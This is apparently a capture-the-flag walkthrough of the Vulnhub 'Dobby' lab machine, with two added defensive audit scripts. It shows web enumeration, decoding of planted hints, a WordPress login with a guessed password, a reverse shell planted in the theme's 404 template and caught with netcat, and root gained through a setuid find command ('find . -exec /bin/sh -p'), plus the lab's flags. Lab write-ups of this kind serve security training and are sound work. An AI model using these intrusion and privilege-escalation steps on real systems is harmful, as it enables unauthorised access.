Vulnhub: Dobby machine, detailed walkthrough

Dobby

Identify the target host's IP address

┌──(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ sudo netdiscover -i eth1


Using Kali Linux's built-in netdiscover tool, the target host's IP address is identified as 192.168.56.186.

NMAP scan

┌──(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.186 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-17 20:22 EST
Nmap scan report for 192.168.56.186
Host is up (0.00055s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.46 ((Ubuntu))
|_http-title: Draco:dG9vIGVhc3kgbm8/IFBvdHRlcg==
|_http-server-header: Apache/2.4.46 (Ubuntu)
MAC Address: 08:00:27:85:C2:A7 (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.99 seconds

From the nmap results, the target has only one open port, 80, running HTTP. Note that the page title is a base64-encoded string; decode it first:

┌──(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ echo "dG9vIGVhc3kgbm8/IFBvdHRlcg==" | base64 -d
too easy no? Potter

Whether Potter is a username is unclear; set it aside for now.

Get Access

Browsing to port 80 returns the Apache default page (apart from the title mentioned above), but the page source contains a comment:

<!--
     See: /alohomora
  -->

┌──(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ curl http://192.168.56.186/alohomora/
Draco's password is his house ;)

Either way, scan for directories first:

┌──(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ gobuster dir -u http://192.168.56.186 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.186
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Timeout:                 10s
===============================================================
2022/11/17 21:02:20 Starting gobuster in directory enumeration mode
===============================================================
/log                  (Status: 200) [Size: 45]
/server-status        (Status: 403) [Size: 279]
Progress: 218431 / 220561 (99.03%)===============================================================
2022/11/17 21:02:47 Finished
===============================================================

┌──(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ curl http://192.168.56.186/log
pass:OjppbGlrZXNvY2tz

hint --> /DiagonAlley

A password shows up here, together with another hint that looks like a directory. Try it:

Browse to that directory:

http://192.168.56.186/DiagonAlley/

The returned page makes it obvious that this is a WordPress site, and one blog post stands out: it is clearly encoded. Looking it up, the encoding is brainfuck, but decoding it only produces garbage, which is odd.

Next, try logging in to the WordPress backend with draco and the password OjppbGlrZXNvY2. Authentication fails, strange!

Perhaps this password is also encoded; base64-decoded it reads: ::ilikesocks

But the decoded password fails as well, so this lead may be wrong.

The earlier hint said draco's password is his house.

A Google search for draco's house name points to Slytherin.

Try logging in with it: success. After logging in, switch the language to English first.

Next, get the shell.php script onto the target through the WordPress backend.

Appearance -> Theme Editor -> 404 Template: the 404 page's PHP code is replaced with the contents of shell.php.
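From the defender's side, the step above (theme PHP rewritten through Appearance -> Theme Editor) is exactly what WordPress's DISALLOW_FILE_EDIT setting exists to prevent, and an edited 404.php leaves a modification time later than the rest of the theme. The following shell script is an added example, not code from the original writeup or from WordPress itself; the install path argument, the constructed test tree and the demo_wp_editor_audit helper are assumptions made for the example.

```shell
#!/bin/sh
# Added example, not part of the original writeup: audit a WordPress install for
# the weakness used above (theme PHP edited from the dashboard).
#   1. Is the built-in file editor disabled (DISALLOW_FILE_EDIT in wp-config.php)?
#   2. Which theme PHP files are newer than the theme's own style.css, i.e. were
#      changed after the theme was installed?
# Usage: wp_editor_audit /path/to/wordpress   (exit 0 = clean, 1 = findings)

wp_editor_audit() {
    root="$1"
    status=0

    # 1. WordPress honours define('DISALLOW_FILE_EDIT', true) by removing the
    #    Theme Editor and Plugin Editor from the dashboard entirely.
    if grep -Eq "define\([[:space:]]*'DISALLOW_FILE_EDIT'[[:space:]]*,[[:space:]]*true[[:space:]]*\)" \
            "$root/wp-config.php" 2>/dev/null; then
        echo "[ok]   DISALLOW_FILE_EDIT is set; the dashboard file editor is unavailable"
    else
        echo "[warn] DISALLOW_FILE_EDIT is not set; any administrator can edit theme PHP from the dashboard"
        status=1
    fi

    # 2. A theme's files are installed together; a 404.php newer than style.css
    #    means someone edited it afterwards.
    for theme in "$root"/wp-content/themes/*/; do
        [ -f "${theme}style.css" ] || continue
        changed=$(find "$theme" -name '*.php' -newer "${theme}style.css")
        if [ -n "$changed" ]; then
            printf '[warn] theme files modified after install:\n%s\n' "$changed"
            status=1
        fi
    done
    return "$status"
}

# Constructed demonstration tree (hypothetical, built in a temp dir): first the
# state the writeup produces, then the same tree after hardening.
demo_wp_editor_audit() {
    d=$(mktemp -d)
    theme="$d/wp-content/themes/amphibious"   # theme name taken from the page; tree is constructed
    mkdir -p "$theme"
    printf "<?php\ndefine('DB_NAME', 'wordpress');\n" > "$d/wp-config.php"
    echo "/* Theme Name: constructed demo */" > "$theme/style.css"
    touch -t 202011070000 "$theme/style.css"            # pretend the theme was installed Nov 2020
    echo "<?php echo 'edited 404 page'; ?>" > "$theme/404.php"   # mtime = now, i.e. edited later
    echo "--- before hardening ---"
    wp_editor_audit "$d" && { rm -rf "$d"; return 1; }   # must report findings here
    # Harden: disable the editor and put back a 404.php with the install timestamp.
    echo "define('DISALLOW_FILE_EDIT', true);" >> "$d/wp-config.php"
    touch -t 202011070000 "$theme/404.php"
    echo "--- after hardening ---"
    wp_editor_audit "$d"
    rc=$?
    rm -rf "$d"
    return "$rc"
}

demo_wp_editor_audit
```

On a real install, run wp_editor_audit against the document root (for this box that would be /var/www/html/DiagonAlley); the mtime check is a heuristic, so a legitimate theme update shows up too and should be reconciled against the change record rather than ignored.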

Looking at the page source:

<link rel='stylesheet' id='admin-bar-css'  href='http://192.168.56.186/DiagonAlley/wp-includes/css/admin-bar.min.css?ver=5.5.3' type='text/css' media='all' />
<link rel='stylesheet' id='wp-block-library-css'  href='http://192.168.56.186/DiagonAlley/wp-includes/css/dist/block-library/style.min.css?ver=5.5.3' type='text/css' media='all' />
<link rel='stylesheet' id='amphibious-bootstrap-grid-css'  href='http://192.168.56.186/DiagonAlley/wp-content/themes/amphibious/css/bootstrap-grid.css?ver=5.5.3' type='text/css' media='all' />
<link rel='stylesheet' id='font-awesome-5-css'  href='http://192.168.56.186/DiagonAlley/wp-content/themes/amphibious/css/fontawesome-all.css?ver=5.5.3' type='text/css' media='all' />
<link rel='stylesheet' id='amphibious-fonts-css'  href='https://fonts.googleapis.com/css?family=Poppins%3A400%2C400i%2C700%2C700i%7CRubik%3A400%2C400i%2C700%2C700i&#038;subset=latin%2Clatin-ext' type='text/css' media='all' />
<link rel='stylesheet' id='amphibious-style-css'  href='http://192.168.56.186/DiagonAlley/wp-content/themes/amphibious/style.css?ver=5.5.3' type='text/css' media='all' />

the location of the 404 page can be guessed as:

'http://192.168.56.186/DiagonAlley/wp-content/themes/amphibious

┌──(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ sudo nc -nlvp 5555
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.186] 38798
Linux HogWarts 5.8.0-26-generic #27-Ubuntu SMP Wed Oct 21 22:29:16 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 03:37:42 up  1:21,  0 users,  load average: 0.00, 0.00, 0.02
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@HogWarts:/$ 

Kali Linux has received the reverse shell from the target:

www-data@HogWarts:/home/dobby$ cat flag1.txt
cat flag1.txt
Command 'cat' not found, but can be installed with:
apt install coreutils
Please ask your administrator.
www-data@HogWarts:/home/dobby$ echo $PATH
echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
www-data@HogWarts:/home/dobby$ which cat
which cat
www-data@HogWarts:/home/dobby$ ls
ls
Descargas   Escritorio  Música      Público  flag1.txt
Documentos  Imágenes    Plantillas  Vídeos   sudoers
www-data@HogWarts:/home/dobby$ more flag1.txt
more flag1.txt
"Harry potter this year should not go to the school of wizardry"

flag1{28327a4964cb391d74111a185a5047ad}
www-data@HogWarts:/home/dobby$ 

That is the user flag. The cat command cannot be used here, so more is used to display the file instead.

Privilege escalation

Upload the linpeas.sh script to the target's /tmp directory, make it executable, and run it.

But we obtained another password earlier; whether it is dobby's password is unknown, so try it first.

Ha, it is correct: the password is ilikesocks.


www-data@HogWarts:/tmp$ su - dobby
su - dobby
Password: OjppbGlrZXNvY2

su: Authentication failure
www-data@HogWarts:/tmp$ su - dobby
su - dobby
Password: ilikesocks

dobby@HogWarts:~$ 

Checking the linpeas.sh output, the find command has the SUID bit set; escalate using the method given on the GTFOBins site.

                               ╔═══════════════════╗
═══════════════════════════════╣ Interesting Files ╠═══════════════════════════════
                               ╚═══════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
strings Not Found
-rwsr-xr-x 1 root root 109K Oct  8  2020 /snap/snapd/9721/usr/lib/snapd/snap-confine  --->  Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304)
-rwsr-xr-x 1 root root 43K Mar  5  2020 /snap/core18/1885/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 63K Jun 28  2019 /snap/core18/1885/bin/ping
-rwsr-xr-x 1 root root 44K Mar 22  2019 /snap/core18/1885/bin/su
-rwsr-xr-x 1 root root 27K Mar  5  2020 /snap/core18/1885/bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 75K Mar 22  2019 /snap/core18/1885/usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root root 44K Mar 22  2019 /snap/core18/1885/usr/bin/chsh
-rwsr-xr-x 1 root root 75K Mar 22  2019 /snap/core18/1885/usr/bin/gpasswd
-rwsr-xr-x 1 root root 40K Mar 22  2019 /snap/core18/1885/usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root root 59K Mar 22  2019 /snap/core18/1885/usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 146K Jan 31  2020 /snap/core18/1885/usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
-rwsr-xr-- 1 root systemd-network 42K Jun 11  2020 /snap/core18/1885/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 427K Mar  4  2019 /snap/core18/1885/usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 43K Sep 16  2020 /snap/core18/1932/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 63K Jun 28  2019 /snap/core18/1932/bin/ping
-rwsr-xr-x 1 root root 44K Mar 22  2019 /snap/core18/1932/bin/su
-rwsr-xr-x 1 root root 27K Sep 16  2020 /snap/core18/1932/bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 75K Mar 22  2019 /snap/core18/1932/usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root root 44K Mar 22  2019 /snap/core18/1932/usr/bin/chsh
-rwsr-xr-x 1 root root 75K Mar 22  2019 /snap/core18/1932/usr/bin/gpasswd
-rwsr-xr-x 1 root root 40K Mar 22  2019 /snap/core18/1932/usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root root 59K Mar 22  2019 /snap/core18/1932/usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 146K Jan 31  2020 /snap/core18/1932/usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
-rwsr-xr-- 1 root systemd-network 42K Jun 11  2020 /snap/core18/1932/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 427K Mar  4  2019 /snap/core18/1932/usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 23K Aug  3  2020 /usr/libexec/polkit-agent-helper-1
-rwsr-xr-- 1 root sssd 92K Oct  6  2020 /usr/libexec/sssd/ldap_child (Unknown SUID binary!)
-rwsr-xr-- 1 root sssd 83K Oct  6  2020 /usr/libexec/sssd/p11_child (Unknown SUID binary!)
-rwsr-xr-- 1 root sssd 168K Oct  6  2020 /usr/libexec/sssd/krb5_child (Unknown SUID binary!)
-rwsr-xr-- 1 root sssd 31K Oct  6  2020 /usr/libexec/sssd/proxy_child (Unknown SUID binary!)
-rwsr-xr-- 1 root sssd 56K Oct  6  2020 /usr/libexec/sssd/selinux_child (Unknown SUID binary!)
-rwsr-xr-- 1 root dip 386K Jul 23  2020 /usr/sbin/pppd  --->  Apple_Mac_OSX_10.4.8(05-2007)
-rwsr-xr-x 1 root root 15K Sep 29  2020 /usr/bin/vmware-user-suid-wrapper
-rwsr-xr-x 1 root root 71K Aug 30  2020 /usr/bin/su
-rwsr-xr-x 1 root root 67K May 28  2020 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 179K Jul  8  2020 /usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 84K May 28  2020 /usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root root 47K Jul 24  2020 /usr/bin/base32
-rwsr-xr-x 1 root root 87K May 28  2020 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 313K Sep 30  2020 /usr/bin/find
-rwsr-xr-x 1 root root 31K Aug  3  2020 /usr/bin/pkexec  --->  Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
-rwsr-xr-x 1 root root 52K May 28  2020 /usr/bin/chsh
-rwsr-xr-x 1 root root 55K Aug 30  2020 /usr/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 39K Aug 30  2020 /usr/bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 44K May 28  2020 /usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root root 39K Mar  7  2020 /usr/bin/fusermount
-rwsr-xr-x 1 root root 467K Jun  7  2020 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 131K Oct 19  2020 /usr/lib/snapd/snap-confine  --->  Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304)
-rwsr-xr-- 1 root messagebus 51K Sep 10  2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-sr-x 1 root root 15K Oct  7  2020 /usr/lib/xorg/Xorg.wrap
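Before going on to the escalation, the defender's view of that listing: a setuid-root /usr/bin/find (and /usr/bin/base32) is not part of a stock Ubuntu image, so comparing the live set of setuid files against a baseline recorded at build time would have flagged it immediately. The script below is an added example, not code from the original writeup or from linpeas; the baseline path, the constructed sample listing and the helper names are assumptions.

```shell
#!/bin/sh
# Added example, not part of the original writeup: detect setuid drift.
# Record the set of setuid files once, when the image is built, then compare
# the live set against it. Anything that gained the bit later is reported.
#
# Baseline creation (run as root after provisioning; the path is an assumption):
#   find / -xdev -perm -4000 -type f 2>/dev/null | sort > /var/lib/suid-baseline.txt
# Live comparison:
#   find / -xdev -perm -4000 -type f 2>/dev/null | sort > /tmp/suid-now.txt
#   suid_audit /var/lib/suid-baseline.txt /tmp/suid-now.txt

# Extract the path column from ls -l style lines such as linpeas prints;
# only lines whose owner-execute position is s/S (setuid) are kept, and the
# "--->" annotations after the path are ignored.
ls_to_paths() {
    awk '$1 ~ /^-..[sS]/ { print $9 }' "$1"
}

# Compare a baseline with a current listing (one path per line each).
# Prints additions and removals; exit status 1 when any file gained setuid.
suid_audit() {
    b=$(mktemp); c=$(mktemp)
    sort -u "$1" > "$b"
    sort -u "$2" > "$c"
    added=$(comm -13 "$b" "$c")      # only in current: newly setuid
    removed=$(comm -23 "$b" "$c")    # only in baseline: setuid bit dropped
    rm -f "$b" "$c"
    [ -n "$added" ]   && printf '[warn] setuid files not in baseline:\n%s\n' "$added"
    [ -n "$removed" ] && printf '[info] baseline entries no longer setuid:\n%s\n' "$removed"
    [ -z "$added" ]
}

# Constructed demonstration: a small baseline and a linpeas-style listing
# modelled on the output above (hypothetical data, built in a temp dir).
demo_suid_audit() {
    d=$(mktemp -d)
    printf '%s\n' /usr/bin/su /usr/bin/passwd /usr/bin/sudo /usr/bin/mount /usr/bin/umount > "$d/baseline"
    printf '%s\n' \
        '-rwsr-xr-x 1 root root 71K Aug 30  2020 /usr/bin/su' \
        '-rwsr-xr-x 1 root root 67K May 28  2020 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)' \
        '-rwsr-xr-x 1 root root 179K Jul  8  2020 /usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable' \
        '-rwsr-xr-x 1 root root 55K Aug 30  2020 /usr/bin/mount' \
        '-rwsr-xr-x 1 root root 313K Sep 30  2020 /usr/bin/find' \
        '-rwsr-xr-x 1 root root 47K Jul 24  2020 /usr/bin/base32' \
        '-rwxr-xr-x 1 root root 39K Aug 30  2020 /usr/bin/umount' \
        > "$d/ls.txt"
    ls_to_paths "$d/ls.txt" > "$d/current"
    suid_audit "$d/baseline" "$d/current"   # reports find and base32 added, umount removed
    rc=$?
    rm -rf "$d"
    return "$rc"
}

demo_suid_audit
```

The comparison is deliberately a plain set difference so it can run from cron or a config-management check on any host with sort and comm; a file integrity tool (AIDE, Tripwire) gives the same signal with more context, but the baseline idea is the point.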

dobby@HogWarts:/var/www/html/DiagonAlley$ ls -alh /usr/bin/find
ls -alh /usr/bin/find
-rwsr-xr-x 1 root root 313K sep 30  2020 /usr/bin/find
dobby@HogWarts:/var/www/html/DiagonAlley$ /usr/bin/find  . -exec /bin/sh -p \; -quit
<onAlley$ /usr/bin/find  . -exec /bin/sh -p \; -quit
# id
id
uid=1000(dobby) gid=1000(dobby) euid=0(root) grupos=1000(dobby),4(adm),24(cdrom),30(dip),46(plugdev),121(lpadmin),132(lxd),133(sambashare)
# cd /root
cd /root
# ls -alh
ls -alh
total 32K
drwx------  4 root root 4,0K nov  7  2020 .
drwxr-xr-x 20 root root 4,0K nov  7  2020 ..
-rw-------  1 root root  162 nov  7  2020 .bash_history
-rw-r--r--  1 root root 3,1K ago 14  2019 .bashrc
drwx------  2 root root 4,0K oct 22  2020 .cache
drwxr-xr-x  3 root root 4,0K nov  7  2020 .local
-rw-r--r--  1 root root  161 sep 16  2020 .profile
-rw-r--r--  1 root root 1,4K nov  7  2020 proof.txt
# cat proof.txt
cat proof.txt
/bin/sh: 4: cat: not found
# more proof.txt
more proof.txt
                                         _ __
        ___                             | '  \
   ___  \ /  ___         ,'\_           | .-. \        /|
   \ /  | |,'__ \  ,'\_  |   \          | | | |      ,' |_   /|
 _ | |  | |\/  \ \ |   \ | |\_|    _    | |_| |   _ '-. .-',' |_   _
// | |  | |____| | | |\_|| |__    //    |     | ,'_`. | | '-. .-',' `. ,'\_
\\_| |_,' .-, _  | | |   | |\ \  //    .| |\_/ | / \ || |   | | / |\  \|   \
 `-. .-'| |/ / | | | |   | | \ \//     |  |    | | | || |   | | | |_\ || |\_|
   | |  | || \_| | | |   /_\  \ /      | |`    | | | || |   | | | .---'| |
   | |  | |\___,_\ /_\ _      //       | |     | \_/ || |   | | | |  /\| |
   /_\  | |           //_____//       .||`      `._,' | |   | | \ `-' /| |
        /_\           `------'        \ |   AND        `.\  | |  `._,' /_\
                                       \|       THE          `.\
                                            _  _  _  _  __ _  __ _ /_
                                           (_`/ \|_)/ '|_ |_)|_ |_)(_
                                           ._)\_/| \\_,|__| \|__| \ _)
                                                           _ ___ _      _
                                                          (_` | / \|\ ||__
                                                          ._) | \_/| \||___


root{63a9f0ea7bb98050796b649e85481845!!}
# 

Root flag obtained.

posted @ 2022-11-18 11:04 Jason_huawen